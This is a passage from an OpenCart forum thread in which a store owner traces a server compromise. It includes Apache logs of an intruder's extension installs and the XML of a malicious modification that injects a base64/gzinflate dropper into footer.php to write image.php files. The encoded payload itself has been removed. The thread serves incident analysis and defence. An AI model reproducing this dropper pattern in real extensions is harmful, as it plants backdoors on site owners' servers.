Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Sun May 12, 2019 12:25 pm

Staring at more logs - I see that the file upload extension must have been installed on April 4th because there are errors with the upload file formats noted in the OC log. Looking back at the apache logs, the first log isn't until April 7th which explains why I don't see the install of the extension.

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Expert Member

Posts

Joined

Fri Aug 18, 2017 4:35 pm

Location

Taiwan

Post by letxobnav » Sun May 12, 2019 1:17 pm

well, up until now you are merely speculating without any evidence one way or the other.
Suggest you start logging posts made to your server, not just the request, the content, then you would have known.

Besides, I did not say this is a digital ocean problem, I said digital ocean is the problem.

Expert Member

Posts

Joined

Fri Aug 18, 2017 4:35 pm

Location - Taiwan

Re: 3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Sun May 12, 2019 6:23 pm

Apache was logging posts to the server

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Sun May 12, 2019 7:13 pm

And here's another hacked opencart that is not me, that's now 3 known with this
Original post: https://opencartforum.com/topic/136313- ... NewComment
Translated: https://translate.google.com/translate? ... rev=search

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Mon May 13, 2019 4:11 am

Pretty sure I see what happened now. I have full backups of the server at random dates. I just took backups when I remembered, usually after I made progress with this OC install project. Ironically I seem to have caught this nasty script at the point where it was installed on the server through the OC extensions but before the binary was created. This is good news because it seems once the script is executed, it cleans up after itself.

From apache logs - here is me installing the file upload extension on April 4th

Code: Select all

209.59.90.220 - - [04/Apr/2019:19:48:23 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=QA61QOnpM1CSLaeGsbAluGxoTi4erooE&extension_install_id=1 HTTP/1.1" 200 178 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=QA61QOnpM1CSLaeGsbAluGxoTi4erooE" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"

And here is the apache log of someone else installing some other extension on April 10th

Code: Select all

193.169.87.26 - - [10/Apr/2019:15:39:50 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe&extension_install_id=2 HTTP/1.1" 200 178 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
193.169.87.26 - - [10/Apr/2019:15:43:08 +0000] "GET /admin/index.php?route=marketplace/install/unzip&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo&extension_install_id=3 HTTP/1.1" 200 178 "http://carguysgarage.org/admin/index.php?route=marketplace/installer&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

And here is the XML for the installed extension -

Code: Select all

<?xml version="1.0" encoding="utf-8"?>
<modification>
   <name><![CDATA[OCstore]]></name>
   <code>OCstore</code>
   <version>1.0</version>
   <author>teknohiz.com</author>
   <link>teknohiz.com</link>
<file path="catalog/controller/common/footer.php">
           <operation error="skip">
            <search><![CDATA[$data['text_newsletter'] = $this->language->get('text_newsletter');]]></search>
                        <add position="after"><![CDATA[
                $datasss = base64_decode(gzinflate(base64_decode('
                ----- REMOVED ENCODED PART FOR THIS FORUM POST ---
                ')));
                                $fp = fopen($_SERVER['DOCUMENT_ROOT'].'/admin/controller/design/image.php', 'w');
                                fwrite($fp, $datasss.PHP_EOL);
                                fclose($fp);
                                $fp = fopen($_SERVER['DOCUMENT_ROOT'].'/catalog/controller/affiliate/image.php', 'w');
                                fwrite($fp, $datasss.PHP_EOL);
                                fclose($fp);
                 ]]></add>
       </operation>
           <operation error="skip">
            <search><![CDATA[$data['newsletter'] = $this->url->link('account/newsletter', '', true);]]></search>
                        <add position="after"><![CDATA[
                                $datasss = base64_decode(gzinflate(base64_decode('
                                ----- REMOVED ENCODED PART FOR THIS FORUM POST ---
                                ')));
                                $fp = fopen($_SERVER['DOCUMENT_ROOT'].'/admin/controller/design/image.php', 'w');
                                fwrite($fp, $datasss.PHP_EOL);
                                fclose($fp);
                                $fp = fopen($_SERVER['DOCUMENT_ROOT'].'/catalog/controller/affiliate/image.php', 'w');
                                fwrite($fp, $datasss.PHP_EOL);
                                fclose($fp);
                 ]]></add>
       </operation>
</file>
</modification>

So now I know this was done via the OC extensions and not via ssh/ftp/or anything else. My guess is someone/thing logged into the admin part of OC and installed this script. It wouldn't have been very hard to guess the admin password I was using, buzzing the usual passwords used would have found it. And now I'll hand this server backup off to the team that manages OC, hopefully it can be useful.

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Legendary Member

Posts

Joined

Tue Mar 04, 2014 1:37 am

Location

Switzerland

Post by IP_CAM » Mon May 13, 2019 4:32 am

File sent to Kapersky Lab. (Name changed, to make passing my Firewall possible...

)

Code: Select all

Thank you for contacting Kaspersky Lab
The files have been scanned in automatic mode.
Malicious code has been detected in the following files:
3_02_conf - HEUR:Trojan.Linux.Agent.go
We will thoroughly analyze the files you sent. If the result of the analysis is different from this automatic scan result, you will be notified via email.
This is an automatically generated message. Please do not reply to it.
Anti-Virus Lab, Kaspersky Lab HQ
"39A/3 Leningradskoe Shosse, Moscow, 125212, Russia
Tel./Fax: + 7 (495) 797 8700 
http://www.kaspersky.com https://www.securelist.com"
---
Sent: 5/12/2019 11:21:00 PM
To: newvirus@kaspersky.com
Subject: Anti-virus Lab replies to your request [VD3][FILE:2][LN:en]
LANG: [LN:en]

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.

Legendary Member

Posts

Joined

Tue Mar 04, 2014 1:37 am

Location - Switzerland

Re: 3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Mon May 13, 2019 4:47 am

IP_CAM wrote: ↑
Mon May 13, 2019 4:32 am
File sent to Kapersky Lab. (Name changed, to make passing my Firewall possible... )

So you were hit with it too?

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Legendary Member

Posts